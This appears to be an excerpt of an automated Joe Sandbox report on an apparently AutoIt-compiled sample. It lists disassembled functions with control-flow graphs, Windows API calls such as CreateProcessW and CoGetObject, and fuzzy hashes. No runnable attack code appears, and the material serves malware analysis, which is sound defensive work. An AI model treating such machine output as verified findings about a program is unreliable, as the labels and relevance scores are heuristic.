                                                                                                                                                                                      Function 009029C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1280 9029c2-9029e2 1282 902a42-902a44 1280->1282 1283 9029e4-9029e7 1280->1283 1282->1283 1284 902a46 1282->1284 1285 902a48 1283->1285 1286 9029e9-9029f0 1283->1286 1287 902a2b-902a33 DefWindowProcW 1284->1287 1288 972307-972335 call 90322e call 91ec33 1285->1288 1289 902a4e-902a51 1285->1289 1290 9029f6-9029fb 1286->1290 1291 902aac-902ab4 PostQuitMessage 1286->1291 1298 902a39-902a3f 1287->1298 1327 97233a-972341 1288->1327 1292 902a53-902a54 1289->1292 1293 902a76-902a9d SetTimer RegisterWindowMessageW 1289->1293 1295 902a01-902a03 1290->1295 1296 97238f-9723a3 call 9457fb 1290->1296 1297 902a72-902a74 1291->1297 1299 902a5a-902a6d KillTimer call 902b94 call 902ac7 1292->1299 1300 9722aa-9722ad 1292->1300 1293->1297 1302 902a9f-902aaa CreatePopupMenu 1293->1302 1303 902ab6-902ac0 call 901e58 1295->1303 1304 902a09-902a0e 1295->1304 1296->1297 1321 9723a9 1296->1321 1297->1298 1299->1297 1306 9722e3-972302 MoveWindow 1300->1306 1307 9722af-9722b1 1300->1307 1302->1297 1322 902ac5 1303->1322 1310 972374-97237b 1304->1310 1311 902a14-902a19 1304->1311 1306->1297 1314 9722b3-9722b6 1307->1314 1315 9722d2-9722de SetFocus 1307->1315 1310->1287 1317 972381-97238a call 93b31f 1310->1317 1319 97235f-97236f call 945fdb 1311->1319 1320 902a1f-902a25 1311->1320 1314->1320 1323 9722bc-9722cd call 90322e 1314->1323 1315->1297 1317->1287 1319->1297 1320->1287 1320->1327 1321->1287 1322->1297 1323->1297 1327->1287 1331 972347-97235a call 902b94 call 903598 1327->1331 1331->1287
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00902A33
                                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 00902A5D
                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00902A80
                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00902A8B
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00902A9F
                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00902AAE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                      • Opcode ID: 3be9a63f5d94f4fd4b4094211bb7c106f8f01b505a301a68add4e47ec13adba0
                                                                                                                                                                                      • Instruction ID: 7553804562d87b079f4ad0f4703a125ef8b7b7afd3bfdc0b15a6082b4de71766
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3be9a63f5d94f4fd4b4094211bb7c106f8f01b505a301a68add4e47ec13adba0
                                                                                                                                                                                      • Instruction Fuzzy Hash: E74137317282499FDB34AF689C0DF79379DFB55340F004525F906921E2EE78CC80A76A
                                                                                                                                                                                      Function 009030A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 009030B0
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 009030BF
                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 009030D5
                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 009030E7
                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 009030F9
                                                                                                                                                                                        • Part of subcall function 0090318A: LoadImageW.USER32(00900000,00000063,00000001,00000010,00000010,00000000), ref: 009031AE
                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00903167
                                                                                                                                                                                        • Part of subcall function 00902F58: GetSysColorBrush.USER32(0000000F), ref: 00902F8B
                                                                                                                                                                                        • Part of subcall function 00902F58: RegisterClassExW.USER32(00000030), ref: 00902FB5
                                                                                                                                                                                        • Part of subcall function 00902F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00902FC6
                                                                                                                                                                                        • Part of subcall function 00902F58: InitCommonControlsEx.COMCTL32(?), ref: 00902FE3
                                                                                                                                                                                        • Part of subcall function 00902F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00902FF3
                                                                                                                                                                                        • Part of subcall function 00902F58: LoadIconW.USER32(000000A9), ref: 00903009
                                                                                                                                                                                        • Part of subcall function 00902F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903018
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                      • Opcode ID: 8c7dbe5f461ab575035e63572cf08f530383971835ec188264cc3a14a26d47dc
                                                                                                                                                                                      • Instruction ID: fffdd1109608b5bd980a04aaf289ba98a5d92b673ac33006a944767d82ae7277
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c7dbe5f461ab575035e63572cf08f530383971835ec188264cc3a14a26d47dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F215CB0D28304AFDB04DFA9EC49E99BBF5FB49310F14812AE614A22E1D3744540AF99
                                                                                                                                                                                      Function 0095B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1344 95b74b-95b7ac VariantInit call 90ca8e CoInitialize 1347 95b7b4-95b7c7 call 91d5f6 1344->1347 1348 95b7ae CoUninitialize 1344->1348 1351 95b7d5-95b7dc 1347->1351 1352 95b7c9-95b7d0 call 90ca8e 1347->1352 1348->1347 1354 95b7de-95b805 call 9084a6 call 93a857 1351->1354 1355 95b81b-95b85b call 9084a6 call 91f885 1351->1355 1352->1351 1354->1355 1366 95b807-95b816 call 95c235 1354->1366 1364 95b861-95b86e 1355->1364 1365 95b9d3-95ba17 SetErrorMode CoGetInstanceFromFile 1355->1365 1368 95b870-95b881 call 91d5f6 1364->1368 1369 95b8a8-95b8b6 GetRunningObjectTable 1364->1369 1370 95ba1f-95ba3a CoGetObject 1365->1370 1371 95ba19-95ba1d 1365->1371 1380 95bad0-95bae3 VariantClear 1366->1380 1389 95b8a0 1368->1389 1390 95b883-95b88d call 90cdb4 1368->1390 1373 95b8d5-95b8e8 call 95c235 1369->1373 1374 95b8b8-95b8c9 1369->1374 1377 95bab5-95bac5 call 95c235 SetErrorMode 1370->1377 1378 95ba3c 1370->1378 1376 95ba40-95ba47 SetErrorMode 1371->1376 1391 95bac7-95bacb call 905cd3 1373->1391 1394 95b8ed-95b8fc 1374->1394 1395 95b8cb-95b8d0 1374->1395 1379 95ba4b-95ba51 1376->1379 1377->1391 1378->1376 1385 95ba53-95ba55 1379->1385 1386 95baa8-95baab 1379->1386 1392 95ba57-95ba78 call 93ac4b 1385->1392 1393 95ba8d-95baa6 call 94a6f6 1385->1393 1386->1377 1389->1369 1390->1389 1404 95b88f-95b89e call 90cdb4 1390->1404 1391->1380 1392->1393 1405 95ba7a-95ba83 1392->1405 1393->1391 1403 95b907-95b91b 1394->1403 1395->1373 1409 95b921-95b925 1403->1409 1410 95b9bb-95b9d1 1403->1410 1404->1369 1405->1393 1409->1410 1412 95b92b-95b940 1409->1412 1410->1379 1415 95b9a2-95b9ac 1412->1415 1416 95b942-95b957 1412->1416 1415->1403 1416->1415 1420 95b959-95b983 call 93ac4b 1416->1420 1424 95b985-95b98d 1420->1424 1425 95b994-95b99e 1420->1425 1426 95b9b1-95b9b6 1424->1426 1427 95b98f-95b990 1424->1427 1425->1415 1426->1410 1427->1425
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0095B777
                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0095B7A4
                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0095B7AE
                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0095B8AE
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 0095B9DB
                                                                                                                                                                                      • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0095BA0F
                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,0098D91C,?), ref: 0095BA32
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 0095BA45
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0095BAC5
                                                                                                                                                                                      • VariantClear.OLEAUT32(0098D91C), ref: 0095BAD5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2395222682-0
                                                                                                                                                                                      • Opcode ID: 3bcd3535e9a9e493016ffc8a3a926ba00302467ad9b25eb4ab6b1c8654fe8512
                                                                                                                                                                                      • Instruction ID: 4ee90921083b6b4895705e72d174a4018faee789f56113667ec10a32644fa404
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bcd3535e9a9e493016ffc8a3a926ba00302467ad9b25eb4ab6b1c8654fe8512
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CC12671608305AFC700DF69C894A6BB7E9FF88319F04491DF98A9B251DB71ED09CB52
                                                                                                                                                                                      Function 0092BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1429 92ba66-92ba93 call 927750 call 928984 call 927616 1436 92bab0-92bab5 1429->1436 1437 92ba95-92baab call 92f630 1429->1437 1439 92babb-92bac2 1436->1439 1443 92bd05-92bd0a call 927795 1437->1443 1441 92bac4-92baf3 1439->1441 1442 92baf5-92bb04 GetStartupInfoW 1439->1442 1441->1439 1444 92bc33-92bc39 1442->1444 1445 92bb0a-92bb0f 1442->1445 1446 92bcf7-92bd03 call 92bd0b 1444->1446 1447 92bc3f-92bc50 1444->1447 1445->1444 1449 92bb15-92bb2c 1445->1449 1446->1443 1450 92bc52-92bc55 1447->1450 1451 92bc65-92bc6b 1447->1451 1454 92bb33-92bb36 1449->1454 1455 92bb2e-92bb30 1449->1455 1450->1451 1456 92bc57-92bc60 1450->1456 1457 92bc72-92bc79 1451->1457 1458 92bc6d-92bc70 1451->1458 1460 92bb39-92bb3f 1454->1460 1455->1454 1463 92bcf1-92bcf2 1456->1463 1464 92bc7c-92bc88 GetStdHandle 1457->1464 1458->1464 1461 92bb61-92bb69 1460->1461 1462 92bb41-92bb52 call 927616 1460->1462 1466 92bb6c-92bb6e 1461->1466 1473 92bbe6-92bbed 1462->1473 1474 92bb58-92bb5e 1462->1474 1463->1444 1467 92bc8a-92bc8c 1464->1467 1468 92bccf-92bce5 1464->1468 1466->1444 1471 92bb74-92bb79 1466->1471 1467->1468 1472 92bc8e-92bc97 GetFileType 1467->1472 1468->1463 1470 92bce7-92bcea 1468->1470 1470->1463 1475 92bbd3-92bbe4 1471->1475 1476 92bb7b-92bb7e 1471->1476 1472->1468 1477 92bc99-92bca3 1472->1477 1481 92bbf3-92bc01 1473->1481 1474->1461 1475->1466 1476->1475 1478 92bb80-92bb84 1476->1478 1479 92bca5-92bcab 1477->1479 1480 92bcad-92bcb0 1477->1480 1478->1475 1484 92bb86-92bb88 1478->1484 1485 92bcb8 1479->1485 1486 92bcb2-92bcb6 1480->1486 1487 92bcbb-92bccd InitializeCriticalSectionAndSpinCount 1480->1487 1482 92bc03-92bc25 1481->1482 1483 92bc27-92bc2e 1481->1483 1482->1481 1483->1460 1488 92bb8a-92bb96 GetFileType 1484->1488 1489 92bb98-92bbcd InitializeCriticalSectionAndSpinCount 1484->1489 1485->1487 1486->1485 1487->1463 1488->1489 1490 92bbd0 1488->1490 1489->1490 1490->1475
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __lock.LIBCMT ref: 0092BA74
                                                                                                                                                                                        • Part of subcall function 00928984: __mtinitlocknum.LIBCMT ref: 00928996
                                                                                                                                                                                        • Part of subcall function 00928984: EnterCriticalSection.KERNEL32(00920127,?,0092876D,0000000D), ref: 009289AF
                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0092BA85
                                                                                                                                                                                        • Part of subcall function 00927616: __calloc_impl.LIBCMT ref: 00927625
                                                                                                                                                                                        • Part of subcall function 00927616: Sleep.KERNEL32(00000000,?,00920127,?,0090125D,00000058,?,?), ref: 0092763C
                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0092BAA0
                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,009B6990,00000064,00926B14,009B67D8,00000014), ref: 0092BAF9
                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0092BB44
                                                                                                                                                                                      • GetFileType.KERNEL32(00000001), ref: 0092BB8B
                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0092BBC4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1426640281-0
                                                                                                                                                                                      • Opcode ID: cbf7951b115e7a0bc9da2f915d65191eb82f4b2fb0fe6879762a19576661510f
                                                                                                                                                                                      • Instruction ID: 4a16e6486d06a51a3ddeef6e026e60f65726a73bcf2eeaeac832f4682d89ce61
                                                                                                                                                                                      • Opcode Fuzzy Hash: cbf7951b115e7a0bc9da2f915d65191eb82f4b2fb0fe6879762a19576661510f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 10811870D097658FDB14CF6CE8806ADBBF4AF45324B24825ED4A6AB3D5CB349803DB50
                                                                                                                                                                                      Function 009623C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1491 9623c5-962426 call 921970 1494 962452-962456 1491->1494 1495 962428-96243b call 90cdb4 1491->1495 1496 96249d-9624a3 1494->1496 1497 962458-962468 call 90cdb4 1494->1497 1506 96243d-962450 call 90cdb4 1495->1506 1507 962488 1495->1507 1501 9624a5-9624a8 1496->1501 1502 9624b8-9624be 1496->1502 1511 96246b-962484 call 90cdb4 1497->1511 1508 9624ab-9624b0 call 90cdb4 1501->1508 1503 9624c0 1502->1503 1504 9624c8-9624e2 call 9084a6 call 903bcf 1502->1504 1503->1504 1524 9625a1-9625a9 1504->1524 1525 9624e8-962541 call 9084a6 call 903bcf call 9084a6 call 903bcf call 9084a6 call 903bcf 1504->1525 1506->1511 1512 96248b-96248f 1507->1512 1508->1502 1511->1496 1523 962486 1511->1523 1518 962491-962497 1512->1518 1519 962499-96249b 1512->1519 1518->1508 1519->1496 1519->1502 1523->1512 1526 9625d3-962601 GetCurrentDirectoryW call 92010a GetCurrentDirectoryW 1524->1526 1527 9625ab-9625c6 call 9084a6 call 903bcf 1524->1527 1571 962543-96255e call 9084a6 call 903bcf 1525->1571 1572 96256f-96259f GetSystemDirectoryW call 92010a GetSystemDirectoryW 1525->1572 1536 962605 1526->1536 1527->1526 1541 9625c8-9625d1 call 9218fb 1527->1541 1539 962609-96260d 1536->1539 1542 96263e-96264e call 949a8f 1539->1542 1543 96260f-962639 call 90ca8e * 3 1539->1543 1541->1526 1541->1542 1555 962650-96269b call 94a17a call 94a073 call 94a102 1542->1555 1556 9626aa 1542->1556 1543->1542 1557 9626ac-9626bb 1555->1557 1589 96269d-9626a8 1555->1589 1556->1557 1561 9626c1-9626f1 call 93bc90 call 9218fb 1557->1561 1562 96274c-962768 CreateProcessW 1557->1562 1585 9626f3-9626f8 1561->1585 1586 9626fa-96270a call 9218fb 1561->1586 1568 96276b-96277e call 92017e * 2 1562->1568 1592 962780-9627b8 call 94d7e4 GetLastError call 907ba9 call 912570 1568->1592 1593 9627bd-9627c9 CloseHandle 1568->1593 1571->1572 1597 962560-962569 call 9218fb 1571->1597 1572->1536 1585->1585 1585->1586 1600 962713-962723 call 9218fb 1586->1600 1601 96270c-962711 1586->1601 1589->1557 1609 96283e-96284f call 949b29 1592->1609 1594 9627f5-9627f9 1593->1594 1595 9627cb-9627f0 call 949d09 call 94a37f call 962881 1593->1595 1602 962807-962811 1594->1602 1603 9627fb-962805 1594->1603 1595->1594 1597->1539 1597->1572 1622 962725-96272a 1600->1622 1623 96272c-96274a call 92017e * 3 1600->1623 1601->1600 1601->1601 1611 962813 1602->1611 1612 962819-962838 call 912570 CloseHandle 1602->1612 1603->1609 1611->1612 1612->1609 1622->1622 1622->1623 1623->1568
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 009623E6
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00962579
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096259D
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009625DD
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009625FF
                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00962760
                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00962792
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 009627C1
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00962838
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4090791747-0
                                                                                                                                                                                      • Opcode ID: 537dde2bc22fa7ceb5c29b365fbcff6b0b5d8e5b6e34de87658eb71f7498ed78
                                                                                                                                                                                      • Instruction ID: bb28f8b2557600b77bc254655d44846994105b8251d02991f904dc070591876d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 537dde2bc22fa7ceb5c29b365fbcff6b0b5d8e5b6e34de87658eb71f7498ed78
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CD18D35608701DFCB24EF24D891B6ABBE5AF85314F14895DF8999B2E2DB30EC41CB52
                                                                                                                                                                                      Function 0095C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1632 95c8b7-95c8f1 1633 95c8f7-95c8fa 1632->1633 1634 95ccfb-95ccff 1632->1634 1633->1634 1635 95c900-95c903 1633->1635 1636 95cd04-95cd05 1634->1636 1635->1634 1637 95c909-95c912 call 95cff8 1635->1637 1638 95cd06 call 95c235 1636->1638 1643 95c925-95c92e call 94be14 1637->1643 1644 95c914-95c920 1637->1644 1641 95cd0b-95cd0f 1638->1641 1647 95c934-95c93a 1643->1647 1648 95cc61-95cc6c call 90d2c0 1643->1648 1644->1638 1650 95c940 1647->1650 1651 95c93c-95c93e 1647->1651 1656 95cc6e-95cc72 1648->1656 1657 95cca9-95ccb4 call 90d2c0 1648->1657 1653 95c942-95c94a 1650->1653 1651->1653 1654 95c950-95c967 call 93abf3 1653->1654 1655 95ccec-95ccf4 1653->1655 1666 95c973-95c97f 1654->1666 1667 95c969-95c96e 1654->1667 1655->1634 1659 95cc74-95cc76 1656->1659 1660 95cc78 1656->1660 1657->1655 1665 95ccb6-95ccba 1657->1665 1663 95cc7a-95cc98 call 91d6b4 call 9497b6 1659->1663 1660->1663 1686 95cc99-95cca7 call 94d7e4 1663->1686 1669 95ccc0 1665->1669 1670 95ccbc-95ccbe 1665->1670 1671 95c981-95c98d 1666->1671 1672 95c9ce-95c9f9 call 91fa89 1666->1672 1667->1636 1674 95ccc2-95ccea call 91d6b4 call 94503c call 912570 1669->1674 1670->1674 1671->1672 1675 95c98f-95c99c call 93a8c8 1671->1675 1682 95ca18-95ca1a 1672->1682 1683 95c9fb-95ca16 call 91ac65 1672->1683 1674->1686 1685 95c9a1-95c9a6 1675->1685 1688 95ca1d-95ca24 1682->1688 1683->1688 1685->1672 1690 95c9a8-95c9af 1685->1690 1686->1641 1693 95ca26-95ca30 1688->1693 1694 95ca52-95ca59 1688->1694 1696 95c9b1-95c9b8 1690->1696 1697 95c9be-95c9c5 1690->1697 1699 95ca32-95ca48 call 93a25b 1693->1699 1702 95cadf-95caec 1694->1702 1703 95ca5f-95ca66 1694->1703 1696->1697 1701 95c9ba 1696->1701 1697->1672 1704 95c9c7 1697->1704 1714 95ca4a-95ca50 1699->1714 1701->1697 1705 95caee-95caf8 1702->1705 1706 95cafb-95cb28 VariantInit call 921970 1702->1706 1703->1702 1709 95ca68-95ca7b 1703->1709 1704->1672 1705->1706 1720 95cb2d-95cb30 1706->1720 1721 95cb2a-95cb2b 1706->1721 1712 95ca7c-95ca84 1709->1712 1715 95ca86-95caa3 VariantClear 1712->1715 1716 95cad1-95cada 1712->1716 1714->1694 1717 95caa5-95cab9 SysAllocString 1715->1717 1718 95cabc-95cacc 1715->1718 1716->1712 1719 95cadc 1716->1719 1717->1718 1718->1716 1722 95cace 1718->1722 1719->1702 1723 95cb31-95cb43 1720->1723 1721->1723 1722->1716 1724 95cb47-95cb4c 1723->1724 1725 95cb4e-95cb52 1724->1725 1726 95cb8a-95cb8c 1724->1726 1727 95cb54-95cb86 1725->1727 1728 95cba1-95cba5 1725->1728 1729 95cbb4-95cbd5 call 94d7e4 call 94a6f6 1726->1729 1730 95cb8e-95cb95 1726->1730 1727->1726 1732 95cba6-95cbaf call 95c235 1728->1732 1738 95cc41-95cc50 VariantClear 1729->1738 1742 95cbd7-95cbe0 1729->1742 1730->1728 1731 95cb97-95cb9f 1730->1731 1731->1732 1732->1738 1740 95cc52-95cc55 call 941693 1738->1740 1741 95cc5a-95cc5c 1738->1741 1740->1741 1741->1641 1744 95cbe2-95cbef 1742->1744 1745 95cbf1-95cbf8 1744->1745 1746 95cc38-95cc3f 1744->1746 1747 95cc26-95cc2a 1745->1747 1748 95cbfa-95cc0a 1745->1748 1746->1738 1746->1744 1750 95cc30 1747->1750 1751 95cc2c-95cc2e 1747->1751 1748->1746 1749 95cc0c-95cc14 1748->1749 1749->1747 1752 95cc16-95cc1c 1749->1752 1753 95cc32-95cc33 call 94a6f6 1750->1753 1751->1753 1752->1747 1754 95cc1e-95cc24 1752->1754 1753->1746 1754->1746 1754->1747
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                      • API String ID: 0-572801152
